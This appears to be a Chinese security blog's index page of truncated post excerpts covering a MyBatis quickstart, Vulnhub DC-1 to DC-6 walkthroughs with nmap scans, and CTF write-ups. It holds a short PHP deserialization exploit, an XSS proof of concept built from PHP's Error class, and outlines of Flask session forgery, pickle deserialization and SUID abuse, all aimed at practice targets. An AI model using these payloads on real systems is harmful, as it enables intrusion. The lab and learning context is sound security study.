Mybatis 快速入门
Mybatis 快速入门配置mybatis-config.xml文件。
123456789101112131415161718192021222324<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config 3.0//EN" "https://mybatis.org/dtd/mybatis-3-config.dtd"><configuration> <environments default="development"> <environment id="development"> <transactionManager type="JDBC"/> & ...
谁偷吃了我的外卖WP
下载拿到就一张图片
用foremost分离一下,得到
一眼base64,将用户_后面的字符提取出来
1234567891011121314import zipfileimport re zipfile=zipfile.ZipFile('外卖箱.zip','r')filenames=zipfile.namelist()filenames=filenames[5:]dic={}for i in filenames: if re.search(r'(\d+)_(.*)', i).group(1)=="1": dic[int(re.search(r'(\d+)_(.*)', i).group(1))]=" " continue dic[int(re.search(r'(\d+)_(.*)', i).group(1))]=re.search(r'(\d+)_([A-Za-z0 ...
Vulnhub之DC-6
信息收集信息收集包括收集靶机的信息!!!!!!
提示了rockyou.txt文件,那么很有可能就是的爆破。
nmap
12345678910111213141516171819202122# Nmap 7.80 scan initiated Tue Oct 31 16:50:52 2023 as: nmap -sn -oN nmap.txt --min-rate 8000 192.168.177.1/24Nmap scan report for 192.168.177.143Host is up (0.00089s latency).# Nmap done at Tue Oct 31 16:50:59 2023 -- 256 IP addresses (1 host up) scanned in 6.31 seconds# Nmap 7.80 scan initiated Tue Oct 31 16:51:59 2023 as: nmap -sV -sC -A -oN nmap.txt --append-output -min-rate 8000 192.168.177.143Nma ...
Vulnhub之DC-4
信息收集ip:192.168.177.140
端口扫描
1nmap -sV -sC -O -A -oN vulnhubs/DC-4/nmap.txt --min-rate 10000 192.168.177.140
123456789101112131415161718192021222324252627282930313233343536# Nmap 7.80 scan initiated Fri Oct 27 18:37:38 2023 as: nmap -sV -sC -O -A -oN vulnhubs/DC-4/nmap.txt --min-rate 10000 192.168.177.140Nmap scan report for 192.168.177.140Host is up (0.00094s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)| ssh-h ...
Vulnhub之DC-3
探测ip1nmap -sn 192.168.177.1/24 --min-rate 8000
1234Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-25 18:16 CSTNmap scan report for 192.168.177.139Host is up (0.00041s latency).Nmap done: 256 IP addresses (1 host up) scanned in 1.38 seconds
ip:192.168.177.139
端口扫描1nmap -sV -O -A -p- -oN vulnhubs/DC-3/scan/nmap.txt 192.168.177.139 --min-rate 8000
123456789101112131415161718192021222324252627282930Nmap scan report for 192.168.177.139Host is up (0.00063s latency).Not shown: 65534 closed ports ...
Vulnhub之DC-2
这个靶场flag很多。。
信息收集ip扫描:
1nmap -sn 192.168.177.1/24 --min-rate 8000
ip:192.168.177.138
端口扫描:
1nmap -sV -O -A -p- -oA ./scan/nmap_scan.nmap --min-rate=8000 192.168.177.138
1234567891011121314151617181920212223242526272829303132333435363738# Nmap 7.80 scan initiated Tue Oct 24 19:49:04 2023 as: nmap -sV -O -A -p- -oA ./scan/nmap_scan.nmap --min-rate=8000 192.168.177.138Nmap scan report for bogon (192.168.177.138)Host is up (0.00059s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERS ...
Vulnhub之DC-1
信息收集1nmap -sV -A --script=vuln -oN ./nmap_scan/DC-1.txt 192.168.177.133
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161# Nmap 7.80 scan initiated Thu Oct 19 19:30:37 2023 ...
NewStart WEEK2 WEB
游戏高手控制台修改gameScore参数值,然后挂掉就行。
ez_sqlSQLmap直接出
Unserialize?反序列化,只要注意它是私有属性就行
exp:
12345678910<?phphighlight_file(__FILE__);// Maybe you need learn some knowledge about deserialize?class evil{ private $cmd="nl /th1s_1s_fffflllll4444aaaggggg";}$a = new evil();echo urlencode(serialize($a));?>
R!!C!!E!!题目提示要扫,那就扫!!!
dirsearch启动
扫出来发现.git无法直接访问,但是可以访问它目录下的其他文件,
在.git/COMMIT_EDITMSG目录下发现 bo0g1pop.php
源码
1234567<?phphighlight_file(__FILE__);if (';' === preg_r ...
PHP原生类的利用
适用类型在PHP反序列化中,没有POP链或者POP链构造到一半无法进行下去,使用原生类进行XSS等。
使用Error/Exception类进行XSSError内置类
适用php7版本
开启报错情况
利用关键:
Error类中内置有_toString方法,在反序列化中经常调用,如果POP构造不了,就可以使用。
举例说明:
1234<?php $a=unserialize($_GET['input']); echo $a;?>
POC:
123456<?php$a = new Error("<script>alert('hello')</script>");$b = serialize($a);echo urlencode($b); ?> //O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A31%3A%22%3Cscript%3Ealert%28%27hello%27%2 ...
羊城杯Serpent
一共大概分作三步。
flask的session伪造
Pickle反序列化
利用SUID的文件读取flag文件
题目内容提示下载网站备份文件www.zip,下载后发现是app.py,打开后果然是flask框架。
123456789101112131415161718192021from flask import Flask, sessionfrom secret import secret@app.route('/verification')def verification(): try: attribute = session.get('Attribute') if not isinstance(attribute, dict): raise Exception except Exception: return 'Hacker!!!' if attribute.get('name') == 'admin' ...